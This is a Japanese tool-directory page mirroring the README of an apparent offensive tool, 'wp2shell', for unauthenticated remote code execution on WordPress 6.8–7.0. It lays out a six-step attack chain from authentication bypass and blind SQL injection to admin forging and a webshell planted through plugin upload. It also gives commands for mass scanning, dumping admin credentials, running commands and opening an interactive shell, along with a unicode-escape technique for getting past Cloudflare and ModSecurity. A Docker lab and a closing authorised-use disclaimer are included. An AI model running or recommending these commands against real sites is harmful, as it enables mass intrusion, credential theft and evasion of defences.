Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/m4xsec/wp2shell-exploit-waf-bypass
ウェブ脆弱性スキャナーエクスプロイトウェブアプリケーション悪用APIセキュリティテストWAFバイパスペネトレーションテストレッドチーミング
GitHubm4xsec/wp2shell-exploit-waf-bypass

wp2shell-Exploit-Waf-Bypass

WordPress 事前認証 RCE エクスプロイト + スキャナー + WAF バイパス | CVE-2026-63030 + CVE-2026-60137 | Go + Python + Metasploit モジュール + Docker ラボ

リポジトリを見る
2121ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
root@kitploit:~
                ___      __         ___
 _      _____  |__ \ ___/ /_  ___  / / /
| | /| / / _ \ __/ // __/ __ \/ _ \/ / / 
| |/ |/ /  __// __//_  / / / /  __/ / /  
|__/|__/\___//____//__/_/ /_/\___/_/_/   
                                         
  WordPress 事前認証RCE — CVE-2026-63030 + CVE-2026-60137
  作者: Venexy (M4xSec)

GitHub Release License: MIT Go Metasploit

WordPress 6.8.0–6.8.5、6.9.0–6.9.4、7.0.0–7.0.1 における未認証のリモートコード実行。6.8.6、6.9.5、7.0.2 でパッチ適用済み。

クイックインストール

root@kitploit:~
# Pre-compiled binary (fastest)
curl -sL https://github.com/M4xSec/wp2shell-Exploit-Waf-Bypass/releases/download/v1.0.0/wp2shell-linux-amd64 -o wp2shell && chmod +x wp2shell

# Or build from source
go build -o wp2shell go-scanner/wp2shell-master.go

攻撃チェーン

  1. ネストされたバッチリクエストによるルート混乱と、無効なプライマーパスによる認証バイパス
  2. 時間ベースのブラインドSQLiでテーブルプレフィックス、管理者ID、認証情報を抽出
  3. UNIONベースの行偽造でoEmbedキャッシュをシード(読み取り専用SQLi → DB書き込み)
  4. 変更セットの権限昇格と再入可能な parse_request() による管理者の偽造
  5. プラグインアップロードで自己クリーンアップ型ウェブシェルを展開
  6. コマンド実行と自動クリーンアップ

ツール

Goスキャナー (go-scanner/wp2shell-master.go)

オールインワンバイナリ — スキャン、チェック、読み取り、エクスプロイト、対話型シェル。

root@kitploit:~
go build -o wp2shell-master go-scanner/wp2shell-master.go

# Mass scan
./wp2shell-master scan -f targets.txt -j -t 20

# Confirm SQLi
./wp2shell-master check https://target.com --waf --delay 3.0

# Extract admin creds
./wp2shell-master read https://target.com --preset users

# Pre-auth RCE (no password needed)
./wp2shell-master rce https://target.com --cmd id -y --waf --stealth

# Interactive shell
./wp2shell-master rce https://target.com -i -y

WAFバイパスツール (waf-bypass/)

Cloudflare/ModSecurityをバイパスするスタンドアロンスクリプト(SQLキーワードのJSONユニコードエスケープによる)。

  • core.py — WAFバイパス付き共有ブラインドSQLiエンジン
  • dump_version.py — @@version を抽出
  • dump_dbname.py — DATABASE() を抽出
  • dump_tables.py — テーブルを列挙
  • dump_columns.py — カラムを列挙
  • rce_shell.py — WAFバイパス付き完全なRCEチェーン

Metasploitモジュール (metasploit-modules/)

  • wp2shell_rce.rb — 完全なRCEエクスプロイトモジュール (PR #21760)
  • wp2shell_scanner.rb — 非破壊スキャナー (PR #21761)

ローカルにインストール:

root@kitploit:~
mkdir -p ~/.msf4/modules/exploits/multi/http
mkdir -p ~/.msf4/modules/auxiliary/scanner/http
cp metasploit-modules/wp2shell_rce.rb ~/.msf4/modules/exploits/multi/http/wp_wordpress_batch_rce.rb
cp metasploit-modules/wp2shell_scanner.rb ~/.msf4/modules/auxiliary/scanner/http/wp_wordpress_batch_sqli.rb

WAFバイパス技術

Cloudflare WAFは生のJSONバイトを検査しますが、パターンマッチングの前に \uXXXX エスケープシーケンスをデコードしません。WordPressのPHP json_decode() は透過的にデコードします。

  • SLEEP → SLEEP — キーワード検出をバイパス
  • コロンプライマー(: を http://: の代わりに使用)— 短く、URIパターンルールを回避
  • /wp-json/batch/v1 パーマリンクパス — ?rest_route= のブロックを回避
  • ターゲットドメインからの Origin + Referer ヘッダー — CORS/同一オリジンチェックを満たす

Dockerラボ

WAFなしラボ (ポート8888)

root@kitploit:~
cd lab
docker compose up -d --build
# WordPress 6.9.0 at http://localhost:8888
# Admin: admin / Summer2026!

WAFラボ (ポート9999)

ModSecurity CRS (OWASP) with Cloudflare-style rules — unicode bypass confirmed.

root@kitploit:~
cd lab/waf
docker compose up -d --build
# WordPress behind WAF at http://localhost:9999

免責事項

このツールは認可されたセキュリティテスト専用です。自分が所有するシステム、またはテストする明示的な書面による許可を得たシステムに対してのみ使用してください。不正アクセスは違法です。

ライセンス

MIT

ツールをダウンロード